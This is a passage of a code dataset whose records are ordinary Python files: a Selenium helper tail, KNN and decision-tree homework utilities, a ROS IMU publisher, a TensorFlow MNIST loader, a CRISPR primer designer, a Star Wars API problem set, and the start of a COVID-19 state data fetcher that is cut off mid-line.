True):\r\n\t\t\t\tbreak\r\n\t\t\ttime.sleep(0.2)\r\n\t\t\t\t\t\r\n\t\t\ttry:\r\n\t\t\t\tif driver.find_element_by_xpath(\"//a[@class='ui-dialog-close']\").is_displayed():\r\n\t\t\t\t\tdriver.find_element_by_xpath(\"//a[@class='ui-dialog-close']\").click()\r\n\t\t\texcept:\r\n\t\t\t\tpass\r\n\r\n\r\nif __name__ == '__main__':\r\n\tprint(str(sys.argv[0]) + \" enter\")","sub_path":"PythonTools/Common/web_common.py","file_name":"web_common.py","file_ext":"py","file_size_in_byte":10747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"435352875","text":"import numpy as np\nfrom typing import List\nfrom hw1_knn import KNN\n\n#TODO: Information Gain function\ndef Information_Gain(S, branches):\n #sum of items in each attribute value \n totalSumAttribute=[0]*len(branches)\n #total sum for this attribute\n totalsum=0\n ig=0\n for i in range(len(branches)):\n tempsum=0\n for j in range(len(branches[0])):\n totalSumAttribute[i]+=branches[i][j]\n totalsum+=branches[i][j]\n \n totalEntropySum=0\n for i in range(len(branches)):\n #print(totalSumAttribute[i], branches[i], totalsum)\n currentEntropy=entropy(totalSumAttribute[i],branches[i])\n #print(currentEntropy)\n totalEntropySum+=(totalSumAttribute[i]/totalsum)*currentEntropy\n #print(\"entropy\", S, \"totalEntropySum\", totalEntropySum)\n return round(S-totalEntropySum,10)\n\n # branches: List[List[any]]\n # return: float\n \ndef entropy(totalsum, labels):\n entropy=0\n for i in range(len(labels)):\n #print(labels[i], totalsum)\n fraction=labels[i]/totalsum\n if fraction==0:\n continue\n entropy+=-1*fraction*np.log2(fraction)\n #print(\"entropy\",entropy)\n return entropy\n \n\n\n# TODO: implement reduced error prunning function, pruning your tree on this function\ndef reduced_error_prunning(decisionTree, X_test, y_test):\n # decisionTree\n # X_test: List[List[any]]\n # y_test: List\n decisionTree.root_node.expectedLabels=y_test\n\n dTree=prune_tree(decisionTree,X_test, y_test) \n #print_tree(dTree)\n decisionTree=dTree\n return\n\ndef find_accuracy(y_test, y_test_predicted):\n correct=0\n for i in range(len(y_test)):\n if y_test[i]==y_test_predicted[i]:\n correct+=1\n return correct\n\ndef prune_tree(dTree,X_test, y_test):\n \n dTree.root_node.zeroOutCorrectPredictions()\n dTree.predict(X_test)\n \n #existingDTree=copy.deepcopy(dTree)\n \n #print_tree(existingDTree)\n \n \n max_node, max_accuracy=findNodeWithMaximumAccuracy(dTree.root_node, 0 , None)\n \n #print(max_node.attribute_val, max_accuracy)\n \n if max_node!=None:\n max_node.children=[]\n max_node.splittable=False\n prune_tree(dTree,X_test, y_test)\n \n return dTree\n\n #if treeNode==None:\n # return\n \"\"\"\n expectedLabelMap=dict()\n tempNode= tree\n parents=[]\n \n findAllParents(tree, parents)\n print('parents',len(parents))\n\n parent_with_max_accuracy=None\n max_accuracy=0\n class_with_max_value=None\n for i in range(len(parents)):\n currentChildren=parents[i].children\n correctLabelsBeforePruning=0\n incorrectLabelsBeforePruning=0\n currentParentMap=dict()\n for j in range(len(currentChildren)):\n predictedClass=currentChildren[j].cls_max\n expectedLabelMap=currentChildren[j].expectedLabelMap\n #print(\"expectedLabelMap\",expectedLabelMap, predictedClass)\n if(expectedLabelMap ==None):\n continue\n else:\n if expectedLabelMap.get(predictedClass) !=None:\n correctLabelsBeforePruning+=expectedLabelMap.get(predictedClass)\n for key,value in expectedLabelMap.items():\n if key!=predictedClass:\n incorrectLabelsBeforePruning+=value\n else:\n correctLabelsBeforePruning+=value\n if currentParentMap.get(key)==None:\n currentParentMap[key]=value\n else:\n currentParentMap[key]+=value \n maximum_class= parents[i].cls_max\n current_value=currentParentMap.get(maximum_class)\n if current_value!=None and current_value>correctLabelsBeforePruning and max_accuracymax_accuracy:\n max_accuracy=gain\n max_node=currentNode\n #print('max_accuracy', max_accuracy, 'max_node', max_node.attribute_val)\n \n if currentNode.splittable:\n #print('children found')\n for i in currentNode.children:\n print('children',i)\n node, accuracy= findNodeWithMaximumAccuracy(i, max_accuracy, max_node)\n if accuracy>max_accuracy:\n max_accuracy=accuracy\n max_node=node \n \n return max_node, max_accuracy\n \n \ndef findAllParents(tree, parents):\n tempChildrenList=tree.children\n #print('list',tempChildrenList)\n if len(tempChildrenList)==0:\n return True\n #print('enter', tempChildrenList)\n allChildLeaves=True\n for i in range(len(tempChildrenList)):\n if not findAllParents(tempChildrenList[i], parents):\n allChildLeaves=False\n break;\n if allChildLeaves:\n parents.append(tree)\n #print('finished')\n return False\n \n \n# print current tree\ndef print_tree(decisionTree, node=None, name='branch 0', indent='', deep=0):\n if node is None:\n node = decisionTree.root_node\n print(name + '{')\n\n print(indent + '\\tdeep: ' + str(deep))\n string = ''\n #print(\"attribute\",node.attributeValue)\n for idx_cls in range(node.num_cls):\n string += str(node.labels.count(idx_cls)) + ' : '\n print(indent + '\\tnum of samples for each class: ' + string[:-2])\n \n #print(indent+'expectedLabelMap='+str(node.expectedLabelMap))\n if node.splittable:\n print(indent + '\\tsplit by dim {:d}'.format(node.dim_split))\n for idx_child, child in enumerate(node.children):\n print_tree(decisionTree, node=child, name='\\t' + name + '->' + str(idx_child), indent=indent + '\\t', deep=deep+1)\n else:\n print(indent + '\\tclass:', node.cls_max)\n print(indent + '}')\n\n \n\n#TODO: implement F1 score\ndef f1_score(real_labels: List[int], predicted_labels: List[int]) -> float:\n assert len(real_labels) == len(predicted_labels)\n truepos=np.sum(np.multiply(real_labels,predicted_labels))\n trueneg=np.sum(np.multiply((np.logical_not(real_labels)),(np.logical_not(predicted_labels))))\n falsepos=np.sum(np.multiply((np.logical_not(real_labels)),(predicted_labels)))\n falseneg=np.sum(np.multiply((real_labels),(np.logical_not(predicted_labels))))\n if(truepos+falseneg)==0 or (truepos+falsepos)==0:\n return 0\n recall=truepos/(truepos+falseneg)\n precision=truepos/(truepos+falsepos)\n if (recall+precision)==0:\n return 0\n return 2*(precision*recall)/(recall+precision)\n\ndef euclidean_distance(point1: List[float], point2: List[float]) -> float:\n #print(\"euclidean_distance\", point1, point2)\n subtract=np.subtract(point1,point2) \n result =np.array(subtract**2, dtype=np.float128)\n return np.sqrt(np.sum(result, axis=0)) \n\n\ndef inner_product_distance(point1: List[float], point2: List[float]) -> float:\n #print(\"inner_product_distance\", point1, point2)\n result=np.array(np.dot(point1,point2), dtype=np.float128)\n return result\n\n\ndef gaussian_kernel_distance(point1: List[float], point2: List[float]) -> float:\n #print(\"gaussian_kernel_distance\", point1, point2)\n return -1*np.exp((np.dot(np.subtract(point1,point2), np.subtract(point1,point2)) / -2))\n\n\n#TODO:\ndef cosine_sim_distance(point1: List[float], point2: List[float]) -> float:\n #print(\"cosine_sim_distance\", point1, point2)\n return 1-(np.array(np.dot(point1,point2),dtype=np.float64)/(np.linalg.norm(point1)*np.linalg.norm(point2)))\n\n\n# TODO: select an instance of KNN with the best f1 score on validation dataset\ndef model_selection_without_normalization(distance_funcs, Xtrain, ytrain, Xval, yval):\n # distance_funcs: dictionary of distance funtion\n # Xtrain: List[List[int]] train set\n # ytrain: List[int] train labels\n # Xval: List[List[int]] validation set\n # yval: List[int] validation labels\n # return best_model: an instance of KNN\n # return best_k: best k choosed for best_model\n # return best_func: best function choosed for best_model\n #print(distance_funcs)\n best_k=-1\n best_score_train=0\n best_score_val=-1 \n best_distance=\"\"\n best_model=None\n #print(len(Xtrain), len(Xval))\n if len(Xtrain)<=30:\n K=len(Xtrain)-1\n else:\n K=30\n for key,val in distance_funcs.items():\n k=1\n while k<=K:\n kNN = KNN(k,val)\n #print(\"train\")\n kNN.train(Xtrain, ytrain)\n #print('Xval before prediction')\n yval_pred=kNN.predict(Xval) \n #print(\"predict1\")\n valid_f1_score=f1_score(yval,yval_pred)\n #print(\"f1_Score1\")\n ytrain_pred=kNN.predict(Xtrain)\n #print(\"predict2\")\n train_f1_score=f1_score(ytrain,ytrain_pred)\n #print(\"f1_Score2\")\n print(best_score_val, valid_f1_score, k, best_k)\n if best_score_val List[List[float]]:\n \"\"\"\n normalize the feature vector for each sample . For example,\n if the input features = [[3, 4], [1, -1], [0, 0]],\n the output should be [[0.6, 0.8], [0.707107, -0.707107], [0, 0]]\n \n for i in range(len(features)):\n currentSum=0;\n for j in range(len(features[0])):\n currentSum+= (features[i][j]*features[i][j]) \n currentSum=np.sqrt(currentSum)\n if currentSum!=0:\n for j in range(len(features[0])):\n features[i][j]=features[i][j]/currentSum\n \n return features\"\"\"\n col_sums = np.linalg.norm(features, axis=1)\n #print(col_sums[:,np.newaxis])\n return [x/y if y else np.zeros((len(x))) for x,y in zip(features,col_sums[:,np.newaxis])]\n #return np.divide(features, col_sums[:,np.newaxis])\n\n\n\nclass MinMaxScaler:\n \"\"\"\n You should keep some states inside the object.\n You can assume that the parameter of the first __call__\n must be the training set.\n\n Hints:\n 1. Use a variable to check for first __call__ and only compute\n and store min/max in that case.\n\n Note:\n 1. You may assume the parameters are valid when __call__\n is being called the first time (you can find min and max).\n\n Example:\n train_features = [[0, 10], [2, 0]]\n test_features = [[20, 1]]\n\n scaler = MinMaxScale()\n train_features_scaled = scaler(train_features)\n # now train_features_scaled should be [[0, 1], [1, 0]]\n\n test_features_sacled = scaler(test_features)\n # now test_features_scaled should be [[10, 0.1]]\n\n new_scaler = MinMaxScale() # creating a new scaler\n _ = new_scaler([[1, 1], [0, 0]]) # new trainfeatures\n test_features_scaled = new_scaler(test_features)\n # now test_features_scaled should be [[20, 1]]\n \"\"\"\n def __init__(self):\n self.min_a=[]\n self.max_a=[]\n \n\n def __call__(self, features: List[List[float]]) -> List[List[float]]:\n \"\"\"\n normalize the feature vector for each sample . For example,\n if the input features = [[2, -1], [-1, 5], [0, 0]],\n the output should be [[1, 0], [0, 1], [0.333333, 0.16667]]\n \"\"\"\n #print(len(features))\n if len(self.min_a) == 0:\n self.min_a=np.min(features, axis=0)\n self.max_a=np.max(features, axis=0)\n \n result=list()\n diff=self.max_a-self.min_a\n for i in range(len(features)):\n temp=[]\n for j in range(len(features[0])):\n if(diff[j]==0):\n # print('diff is zero')\n temp.append(0)\n else:\n div=(features[i][j]-self.min_a[j])/diff[j]\n temp.append(div)\n result.append(temp)\n return result\n #return np.nan_to_num(np.divide(np.subtract(features,self.min_a),diff))\n\n","sub_path":"knn and decision trees/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":16246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"368889515","text":"#! /usr/bin/env python\n__author__=\"Ojit\"\nimport requests , sys , time , urllib , json \nimport rospy\nfrom sensor_msgs.msg import Imu, LaserScan\n\nrospy.init_node(\"imu_from_web\",anonymous=True)\n\nclass Main(object):\n def __init__(self, url_arg=\"10.60.8.174:8080\"):\n self.host_url=\"http://\"+url_arg+\"/sensors.json\"\n print(\"URL set to:\",self.host_url)\n self.imu_pub = rospy.Publisher(\"/imu0\", Imu , queue_size=10)\n self.req = requests.get(self.host_url)\n self.imu_message = Imu()\n self.gyro_mean_read = [0,0,0]\n self.accel_mean_read = [0,0,0]\n self.hist_gyro = [0,0,0]\n self.hist_accel= [0,0,-9.8]\n self.rate=rospy.Rate(200)\n print(\"init complete\")\n\n\n def get_data(self):\n self.count=0\n # [u'battery_level', u'gyro', u'proximity', u'battery_voltage', u'gravity', u'accel', u'battery_temp', u'rot_vector', u'mag', u'light', u'lin_accel']\n \n while not rospy.is_shutdown():\n # send request to server and get data in json \n # self.req = requests.get(self.host_url,params={'gyro':'gyro','lin_accel':'lin_accel'})\n # raw_data = self.req.json()\n try:\n self.url_req = urllib.urlopen(self.host_url)\n self.raw_data = json.loads(self.url_req.read())\n except Exception as e:\n print(e)\n # self.req = grequests.get(self.host_url)\n # self.responses = grequests.map(self.req)\n # raw_data = self.responses[0].json()\n \n # get past values of raw gyro and accel data\n self.gyro_mean_read = self.raw_data['gyro']['data'][-1][1]\n self.accel_mean_read = self.raw_data['accel']['data'][-1][1]\n self.set_vals()\n\n #publish data\n self.imu_pub.publish(self.imu_message)\n # self.count+=1\n\n\n def set_vals(self):\n #Set data\n self.imu_message = Imu()\n self.imu_message.header.stamp = rospy.Time().now()\n\n self.imu_message.angular_velocity.x = self.gyro_mean_read[0]\n self.imu_message.angular_velocity.y = self.gyro_mean_read[1]\n self.imu_message.angular_velocity.z = self.gyro_mean_read[2]\n\n self.imu_message.linear_acceleration.x = self.accel_mean_read[0]\n self.imu_message.linear_acceleration.y = self.accel_mean_read[1]\n self.imu_message.linear_acceleration.z = self.accel_mean_read[2]\n\n\n\n\nif __name__ == \"__main__\":\n # try:\n i = Main(sys.argv[1])\n i.get_data()\n # except Exception as e:\n # print(\"provide url after hosting on web. Follow Readme\")\n # print(e)\n","sub_path":"scripts/temp_testing.py","file_name":"temp_testing.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"130824338","text":"# -*- coding: utf-8 -*-\nimport tensorflow as tf\n\n# load mnist\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist= input_data.read_data_sets(\"MNIST/\", one_hot= True)\n\n# load model\nfname= \"./tmp/model.ckpt.meta\"\n\n# load the saved graph\nnew_saver= tf.train.import_meta_graph(fname)\nwith tf.Session() as sess:\n # restore saved internal variables\n new_saver.restore(sess,tf.train.latest_checkpoint(\"./tmp\"))\n # get saved variables\n in_vars= tf.get_collection(\"inputs\")\n test_vars= tf.get_collection(\"tests\")\n \n acc_test= sess.run(test_vars[1], \n feed_dict={in_vars[0]:mnist.test.images,\n in_vars[1]:mnist.test.labels})\n print (\"Test accuracy: %.4f\"%(acc_test))\n","sub_path":"loadModel.py","file_name":"loadModel.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"351872322","text":"from termcolor import colored\n\n\nclass Designer():\n\n gRNA = ''\n cutsite_index = ''\n stop_codon = ''\n three_letter_stop = ''\n sequence = ''\n hom_arm_left = ''\n hom_arm_right = ''\n forward_primer = ''\n second_forward_primer = ''\n\n reverse_primer_one = ''\n reverse_primer_two = ''\n rev_primer_one_complement = ''\n second_primer_complement = ''\n\n def __init__(self, gRNA='', stop_codon='', forward_primer='', second_forward_primer='', rev_primer_one='', rev_primer_two='', file_name='', hom_arm_length=0):\n\n # minus one because you are going to be deleting the '|'\n self.cutsite_index = gRNA.index('|') - 1\n self.gRNA = gRNA.replace('|', '')\n self.stop_codon = stop_codon\n self.three_letter_stop = stop_codon[-3:]\n\n with open(file_name, 'r') as f:\n self.sequence = f.read().replace('\\n', '')\n\n self.sequence = self.sequence.rstrip()\n\n self.forward_primer = forward_primer\n self.second_forward_primer = second_forward_primer\n self.reverse_primer_one = rev_primer_one\n self.reverse_primer_two = rev_primer_two\n self.rev_primer_one_complement = self.complement(rev_primer_one)\n self.second_primer_complement = self.complement(rev_primer_two)\n\n # need to add 1 because looking at point in between the cutsite\n gRNA_index = self.sequence.index(self.gRNA) + self.cutsite_index + 1\n\n self.stop_codon_index = self.sequence.index(self.stop_codon) + self.stop_codon.index(self.three_letter_stop)\n\n self.hom_arm_left = self.sequence[(gRNA_index - hom_arm_length): gRNA_index]\n self.hom_arm_right = self.sequence[gRNA_index: (gRNA_index + hom_arm_length)]\n\n self.validateSequences()\n\n def validateSequences(self):\n\n if self.hom_arm_left in self.sequence and self.hom_arm_right in self.sequence:\n print('homology arm validation passed')\n else:\n self.printError('homology arm validation failed')\n\n if self.stop_codon in self.sequence:\n print('stop codon validation passed')\n else:\n self.printError('stop codon validation failed')\n\n if self.forward_primer in self.sequence:\n print('forward primer validation passed')\n else:\n self.printError('forward primer validation failed')\n\n if self.second_forward_primer in self.sequence:\n print('second forward primer validation passed')\n else:\n self.printError('second forward primer validation failed')\n\n if self.rev_primer_one_complement in self.sequence:\n print('reverse primer one complement validation passed')\n else:\n self.printError('reverse primer one validation failed')\n\n if self.second_primer_complement in self.sequence:\n print('reverse primer two complement validation passed')\n else:\n self.printError('reverse primer two validation failed')\n\n if self.sequence[(self.sequence.index(self.gRNA) + len(self.gRNA) + 1):self.sequence.index(self.gRNA) + len(self.gRNA) + 3] != 'GG':\n\n print(colored('Warning: ', 'red') + 'gRNA site is not immediately upstream of canonical Cas9 PAM Site(NGG). Ignore this if you are using not using spCas9.')\n\n # testing the output string\n self.print_sequence(colored=lambda x, y: x, test=True)\n\n def writeHomArmToFile(self, save_file_left, save_file_right):\n with open(save_file_left, 'w') as f:\n f.write(self.hom_arm_left)\n\n with open(save_file_right, 'w') as f:\n f.write(self.hom_arm_right)\n\n def print_sequence(self, colored=colored, test=False, upstream_margin=100, downstream_margin=50):\n\n output_string = ''\n\n # creating indexes for important features\n fp_index = self.sequence.index(self.forward_primer)\n rp_index = self.sequence.index(self.rev_primer_one_complement)\n second_primer_index = self.sequence.index(self.second_forward_primer)\n second_primer_complement_index = self.sequence.index(self.second_primer_complement)\n gRNA_print_index = self.sequence.index(self.gRNA)\n\n # forward primer one printing\n output_string += self.sequence[fp_index - upstream_margin: fp_index]\n output_string += colored(self.forward_primer, 'blue')\n output_string += self.sequence[fp_index + len(self.forward_primer): rp_index]\n\n # reverse primer one printing\n output_string += colored(self.rev_primer_one_complement, 'yellow')\n output_string += self.sequence[rp_index + len(self.rev_primer_one_complement): gRNA_print_index]\n\n # gRNA printing\n output_string += colored(self.gRNA, 'green')\n\n # stop codon and second forward primer printing\n\n # If forward primer for downstream homology arm is overlapping with the stop codon\n if self.stop_codon_index > second_primer_index and self.stop_codon_index < second_primer_index + len(self.second_forward_primer):\n output_string += self.sequence[gRNA_print_index + len(self.gRNA): second_primer_index]\n three_stop_index = self.second_forward_primer.index(self.three_letter_stop)\n output_string += colored(self.second_forward_primer[: three_stop_index], 'blue')\n output_string += colored(self.three_letter_stop, 'red')\n output_string += colored(self.second_forward_primer[three_stop_index + len(self.three_letter_stop):], 'blue')\n output_string += self.sequence[second_primer_index + len(self.second_forward_primer): second_primer_complement_index]\n\n else:\n output_string += self.sequence[gRNA_print_index + len(self.gRNA):self.stop_codon_index]\n output_string += colored(self.sequence[self.stop_codon_index:self.stop_codon_index + 3], 'red')\n\n # printing second primer\n output_string += self.sequence[self.stop_codon_index + 3:second_primer_index]\n output_string += colored(self.sequence[second_primer_index: second_primer_index + len(self.second_forward_primer)], 'blue')\n output_string += self.sequence[second_primer_index + len(self.second_forward_primer): second_primer_complement_index]\n\n output_string += colored(self.second_primer_complement, 'yellow')\n output_string += self.sequence[second_primer_complement_index + len(self.second_primer_complement): second_primer_complement_index + len(self.second_primer_complement) + downstream_margin]\n\n if test:\n if output_string in self.sequence:\n print('output string validation passed')\n else:\n print('output string validation failed')\n return\n\n # getting homology arm lengths\n\n gRNA_index = self.sequence.index(self.gRNA) + self.cutsite_index + 1\n hom_arm_length_left = gRNA_index - fp_index\n\n hom_arm_length_right = second_primer_complement_index + len(self.second_primer_complement) - gRNA_index\n\n # gettign difference from cut site\n left_difference = gRNA_index - (rp_index + len(self.rev_primer_one_complement))\n right_difference = second_primer_index - gRNA_index\n\n # printing\n print()\n print()\n print('gRNA cut site: ' + self.gRNA[:self.cutsite_index + 1] + colored('|', 'cyan') + self.gRNA[self.cutsite_index + 1:])\n print('Left Homology Arm: {} bp -> {} bp from gRNA cut site'.format(hom_arm_length_left, left_difference))\n print('Right Homology Arm: {} bp -> {} bp from gRNA cut site'.format(hom_arm_length_right, right_difference))\n print('-----------------------------------------------------')\n print('forward primer = ' + colored('blue', 'blue'))\n print('reverse primer = ' + colored('yellow', 'yellow'))\n print('gRNA = ' + colored('green', 'green'))\n print('stop codon = ' + colored('red', 'red'))\n print(output_string)\n\n def complement(self, sequence, three_to_five=False):\n complements = {'A': 'T', 'G': 'C', 'T': 'A', 'C': 'G'}\n # have to flip bases AND reverse since its on opposite strand\n if three_to_five:\n # don't flip it want it 3' -> 5'\n return ''.join([complements[x] for x in sequence])\n else:\n return ''.join([complements[x] for x in sequence])[:: -1]\n\n def printPrimersPlusGibson(self):\n forward_gibson_one = colored('TCCCCGACCTGCAGCCCAGCT', 'magenta')\n forward_gibson_two = colored('AGTTCTTCTGATTCGAACATC', 'magenta')\n rev_gibson_two = colored('TGGAGAGGACTTTCCAAG', 'magenta')\n\n # this is the codon immediately upstream of stop codon(have to complement since this is obtained from positive strand)\n NNN = self.complement(self.sequence[(self.stop_codon_index - 3):self.stop_codon_index])\n rev_gibson_one = colored('CCGGAACCTCCTCCGCTCCC' + NNN, 'magenta')\n\n print('\\n------Primers With Gibson Sequences: ')\n print('Forward Primer One: ' + forward_gibson_one + self.forward_primer + \" (5' -> 3')\")\n print('Reverse Primer One: ' + rev_gibson_one + self.reverse_primer_one + \" (5' -> 3')\")\n print('Forward Primer Two: ' + forward_gibson_two + self.second_forward_primer + \" (5' -> 3')\")\n print('Reverse Primer Two: ' + rev_gibson_two + self.reverse_primer_two + \" \\t(5' -> 3')\")\n\n def printgRNAWithOverhang(self):\n top_overhang_five_prime_end = 'CACC'\n bottom_overhang_five_prime_end = 'CAAA'\n\n # have to add G to 5' end of top-strand and C to 3' end of bottom strand b/c that G-C pair is necessary for the U6 promoter(according to paper)\n print('\\n------gRNAs with overhang and added G-C base pair: ')\n print('Top Strand: ' + colored(top_overhang_five_prime_end, 'magenta') + colored('G', 'cyan') + self.gRNA + \"\\t (5' -> 3')\")\n print('Bottom Strand: ' + colored('C', 'cyan') + self.complement(self.gRNA, three_to_five=True) + colored(bottom_overhang_five_prime_end, 'magenta') + \" (3' -> 5')\")\n\n def printError(self, s):\n print(colored('Error: ', 'red') + s)\n\n\nif __name__ == '__main__':\n print(colored('Error: ', 'red') + 'Please run main.py')\n\n","sub_path":"code/Designer.py","file_name":"Designer.py","file_ext":"py","file_size_in_byte":10192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"636166634","text":"import requests, json\n\n# PROBLEM SET 09\n\nENDPOINT = 'https://swapi.py4e.com/api'\n\n# BEGIN ASSIGNMENT:\n\n# PROBLEM 01: Finish get_swapi_resource.\ndef get_swapi_resource(url, params=None):\n \"\"\"This function initiates an HTTP GET request to the SWAPI service in order to return a\n representation of a resource. The function defines two parameters, the resource url (str) and\n an optional params (dict) query string of key:value pairs may be provided as search terms\n (e.g., {'search': 'yoda'}). If a match is obtained from a search, be aware that the JSON object\n that is returned will include a list property named 'results' that contains the resource(s)\n matched by the search query term(s).\n\n Parameters:\n resource (str): a url that specifies the resource.\n params (dict): optional dictionary of querystring arguments. This parameter should\n have a default value of None.\n\n Returns:\n dict: dictionary representation of the decoded JSON.\n \"\"\"\n\n if params:\n response = requests.get(url, params=params).json()\n else:\n response = requests.get(url).json()\n\n return response\n\n\n# PROBLEM 02: Finish read_json\ndef read_json(filepath):\n \"\"\"This function reads a JSON document and returns a dictionary if provided with a valid\n filepath.\n\n Parameters:\n filepath (str): path to file.\n\n Returns:\n dict: dictionary representations of the decoded JSON document.\n \"\"\"\n\n with open(filepath, 'r', encoding='utf-8') as file_obj:\n data = json.load(file_obj)\n\n return data\n\n\n# PROBLEM 03: Finish write_json\ndef write_json(filepath, data):\n \"\"\"Given a valid filepath writes data to a JSON file.\n\n Parameters:\n filepath (str): the path to the file.\n data (dict): the data to be encoded as JSON and written to the file.\n\n Returns:\n None\n \"\"\"\n\n with open(filepath, 'w', encoding='utf-8') as file_obj:\n json.dump(data, file_obj, ensure_ascii=False, indent=2)\n\n\n# PROBLEM 04: Create the __init__, __str__, and evaluate_information methods to Person\nclass Person():\n \"\"\"\n This class contains all of the information that the First Order has on a person.\n\n Instance Variables:\n name (str): Name of the person.\n hair_color (str): Hair color of the person.\n eye_color (str): Eye color of the person.\n species_name (str): Name of the species of the person.\n location (str): Current planet the person is known to be operating on.\n The location starts out as 'unknown' until we can cross-reference our\n central databases with the information from our informants. THAT'S YOUR\n JOB!\n \"\"\"\n\n def __init__(self, name, hair_color, eye_color, species_name):\n\n self.name = name\n self.hair_color = hair_color\n self.eye_color = eye_color\n self.species_name = species_name\n self.location = 'unknown'\n\n def __str__(self):\n\n description = f\"{self.name} is a {self.species_name} with {self.hair_color} hair and {self.eye_color} eyes. Location: {self.location}\"\n return description\n\n def evaluate_information(self, information_dict):\n \"\"\"\n This method will take a dictionary that has the following keys:\n\n hair_color, eye_color, species_name, location, name\n\n and it will check if the values to those keys are the exact same as the\n respective instance variable (e.g. should be the same as ). If\n all keys are the same, then update to be the value of the\n key.\n\n Parameters:\n information_dict (dict): A dictionary of information to compare with the instance\n variables.\n\n Returns:\n None, but has the potential to update self.location\n \"\"\"\n\n if information_dict['name'] == self.name and information_dict['hair_color'] == self.hair_color and information_dict['eye_color'] == self.eye_color and information_dict['species_name'] == self.species_name:\n self.location = information_dict['location']\n\n\n# PROBLEM 05: Build the main() function following the cues\ndef main():\n \"\"\"\n This function will use various utility functions, classes, and methods to determine\n the location of two Resistance members: Rey and Chewbacca. Nothing is returned from\n this function, however a file is produced.\n\n Parameters:\n None\n\n Returns:\n None\n \"\"\"\n\n # First, call with the correct parameters (you'll likely want\n # to pass a parameters dictionary like so: {'search':'rey'}) to retrieve a\n # dictionary of data about Rey. Save it to . Make sure is a\n # dictionary, and not a list!\n rey_data = get_swapi_resource(ENDPOINT + '/people', {'search':'rey'})\n rey_data = rey_data['results'][0]\n\n print(f\"\\n Rey species = {rey_data}['species']\\n\")\n\n # Now, get Rey's species name by making a request to the url that is contained in the string\n # stored in . Save the name of that species to .\n # should be a string. Then, add a new key/value pair to \n # which has a key of \"species_name\" and a value of .\n rey_species = get_swapi_resource(rey_data['species'][0])\n rey_species = rey_species['name']\n rey_data['species_name'] = rey_species\n\n # Do the same thing for Chewbacca, saving the information to and\n # .\n chewbacca_data = get_swapi_resource(ENDPOINT + '/people', {'search':'chewbacca'})\n chewbacca_data = chewbacca_data['results'][0]\n chewbacca_species = get_swapi_resource(chewbacca_data['species'][0])\n chewbacca_species = chewbacca_species['name']\n chewbacca_data['species_name'] = chewbacca_species\n\n # Create instances of for both Rey and Chewbacca using the data you have stored\n # in the dictionaries , and strings , \n rey = Person(rey_data['name'], rey_data['hair_color'], rey_data['eye_color'], rey_data['species_name'])\n chewbacca = Person(chewbacca_data['name'], chewbacca_data['hair_color'], chewbacca_data['eye_color'], chewbacca_data['species_name'])\n\n print(f\"\\nChewie species = {chewbacca.species_name}\\n\")\n\n\n # Read in the data from the informants using the function.\n # Make a new list that only contains the information on rey.\n # Make a new list that only contains the information on chewbacca.\n # If you are confused, look at the keys of the dictionary that resulted from your\n # call to .\n informant_info = read_json('informants.json')\n rey_info = informant_info['information_on_rey']\n chewbacca_info = informant_info['information_on_chewbacca']\n\n # For each dictionary in , utilize the method from the\n # instance of for Rey. Only one entry of should flag as True and update\n # Rey's location. Then, do the same for Chewbacca.\n for info in rey_info:\n rey.evaluate_information(info)\n\n for info in chewbacca_info:\n chewbacca.evaluate_information(info)\n\n print(rey)\n print(chewbacca)\n\n # Create a new dictionary with only two key value pairs:\n #\n # {\n # 'Rey': \n # 'Chewbacca': \n # }\n out_dict = {}\n out_dict['Rey'] = str(rey)\n out_dict['Chewbacca'] = str(chewbacca)\n\n # Write out your new dictionary to using \n write_json('updated_information.json',out_dict)\n\n# END ASSIGNMENT\n\nif __name__ == '__main__':\n main()\n","sub_path":"problem_sets/ps_09-2020Winter/problem_set_09_solution.py","file_name":"problem_set_09_solution.py","file_ext":"py","file_size_in_byte":7882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"361078329","text":"#!/usr/bin/python3\n\nimport requests\nimport json\nimport re\n\nUS_URL = \"https://covidtracking.com/api/states/daily\"\nDatasetsDir = './Datasets/US'\nstatesCodesFile = \"./us-codes-to-states.json\"\n\ncodesAndStatesMap = dict()\nfilenameToHandlerMap = dict()\nstateCodeToDataMap = dict()\ndoneWithStateData = dict()\n\n\ndef replaceSpecialCharacters(filename):\n filename = re.sub(r'\\s+', ' ', filename)\n filename = filename.replace(' ', '-')\n filename = filename.replace('(', '')\n filename = filename.replace('.', '')\n filename = filename.replace(')', '')\n\n return filename\n\n\ndef prepareCodeAndStates():\n fhandle = open(statesCodesFile)\n codesAndStatesMap = json.load(fhandle)\n headerLine = \"Day,Date,Confirmed,Recovered,Deaths\\n\"\n\n for stateCode in codesAndStatesMap:\n stateName = codesAndStatesMap[stateCode]\n filename = replaceSpecialCharacters(stateName)\n filename = DatasetsDir + '/' + filename + '.csv'\n fileHandler = open(filename, 'w')\n fileHandler.write(headerLine)\n filenameToHandlerMap[stateCode] = fileHandler\n stateCodeToDataMap[stateCode] = list()\n doneWithStateData[stateCode] = False\n\n\ndef modifyData(date):\n date = str(date)\n i = 0\n newDate = \"\"\n for char in date:\n newDate += char\n i += 1\n if i == 4 or i == 6:\n newDate += '-'\n\n return newDate\n\n\ndef anyElement(arr, function):\n for element in arr:\n if function(element):\n return True\n return False\n\n\nprepareCodeAndStates()\nresponse = requests.get(US_URL)\njsonData = response.json()\n# print(jsonData)\nprint(\"Fetching Done!\")\n\nday = 0\nprevDate = None\nfor stateObject in jsonData:\n stateCode = stateObject[\"state\"]\n date = stateObject[\"date\"]\n date = modifyData(date)\n if prevDate == None or prevDate != date:\n day += 1\n\n confirmedCases = stateObject[\"positive\"]\n recoveredCases = stateObject[\"recovered\"]\n deaths = stateObject[\"death\"]\n\n fhandle = filenameToHandlerMap[stateCode]\n itemsToWrite = [day, date, confirmedCases, recoveredCases, deaths]\n if (not doneWithStateData[stateCode]) and (not anyElement(itemsToWrite, lambda x: x == None)):\n lineToWrite = ', '.join(list(map(str, 